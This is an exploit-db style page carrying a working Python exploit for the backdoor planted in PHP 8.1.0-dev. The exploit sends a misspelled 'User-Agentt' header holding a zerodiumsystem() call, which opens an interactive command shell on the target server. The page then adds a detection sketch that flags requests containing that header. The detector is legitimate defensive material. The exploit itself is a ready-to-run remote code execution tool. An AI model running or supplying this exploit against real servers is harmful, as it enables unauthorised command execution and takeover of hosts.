PHP 8.1.0-dev – ‘User-Agentt’ Remote Code Execution

  • Author: flast101
    Date: 2021-06-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/49933/
  • # Exploit Title: PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
    # Date: 23 may 2021
    # Exploit Author: flast101
    # Vendor Homepage: https://www.php.net/
    # Software Link:
    # - https://hub.docker.com/r/phpdaily/php
    # - https://github.com/phpdaily/php
    # Version: 8.1.0-dev
    # Tested on: Ubuntu 20.04
    # References:
    # - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    # - https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md
    
    """
    Blog: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/
    Download: https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py
    Contact: flast101.sec@gmail.com
    
    An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header.
    The following exploit uses the backdoor to provide a pseudo shell on the host.
    """
    
    #!/usr/bin/env python3
    import os
    import re
    import requests
    
    host = input("Enter the full host url:\n")
    request = requests.Session()
    response = request.get(host)
    
    # Continue only if the host answers the initial request with HTTP 200
    if response.status_code == 200:
        print("\nInteractive shell is opened on", host, "\nCan't access tty; job control turned off.")
        try:
            while True:
                cmd = input("$ ")
                headers = {
                    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
                    # The misspelled header name is what the backdoor reacts to
                    "User-Agentt": "zerodiumsystem('" + cmd + "');"
                }
                response = request.get(host, headers=headers, allow_redirects=False)
                current_page = response.text
                # Command output is emitted before the regular HTML page
                stdout = current_page.split('<!DOCTYPE html>', 1)
                print(stdout[0])
        except KeyboardInterrupt:
            print("Exiting...")
            exit()
    
    else:
        print("\r")
        print(response)
        print("Host is not available, aborting...")
        exit()
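
Seen from the defending side, the request sent by the script above stands out because of its misspelled header name. The following detection sketch is an added example, not part of the original exploit-db entry: it classifies raw HTTP request heads, matching the `User-Agentt` header case-insensitively and the `zerodium` value prefix visible in the script. The function names, the host `app.example` and the sample requests are constructed for illustration.

```python
TRIGGER_HEADER = "user-agentt"  # header name from the page, compared lower-cased
TRIGGER_PREFIX = "zerodium"     # value prefix visible in the page's script


def parse_headers(raw_request):
    """Return [(lower-cased name, value)] from a raw HTTP/1.x request head."""
    head = raw_request.replace("\r\n", "\n").split("\n\n", 1)[0]
    headers = []
    for line in head.split("\n")[1:]:            # skip the request line
        if line[:1] in (" ", "\t") and headers:  # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, (value + " " + line.strip()).strip())
            continue
        name, sep, value = line.partition(":")
        if sep:
            headers.append((name.strip().lower(), value.strip()))
    return headers


def classify(raw_request):
    """Return 'trigger', 'suspicious' (header with another value) or 'clean'."""
    values = [v for n, v in parse_headers(raw_request) if n == TRIGGER_HEADER]
    if not values:
        return "clean"
    if any(v.lower().startswith(TRIGGER_PREFIX) for v in values):
        return "trigger"
    return "suspicious"


# Constructed sample requests (hypothetical host and paths).
SAMPLES = {
    "normal": "GET / HTTP/1.1\r\nHost: app.example\r\n"
              "User-Agent: Mozilla/5.0\r\n\r\n",
    "backdoor": "GET / HTTP/1.1\r\nHost: app.example\r\n"
                "User-Agent: Mozilla/5.0\r\n"
                "User-Agentt: zerodiumsystem('<cmd>');\r\n\r\n",
    "probe": "GET /index.php HTTP/1.1\r\nHost: app.example\r\n"
             "USER-AGENTT: test\r\n\r\n",
}


def scan(samples=SAMPLES):
    """Map each sample name to its classification."""
    return {name: classify(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan().items():
        print(f"{name}: {verdict}")
```

Common access-log formats record only the regular `User-Agent` value, so a check like this has to run where full request headers are visible, such as a reverse proxy, a WAF or a packet capture.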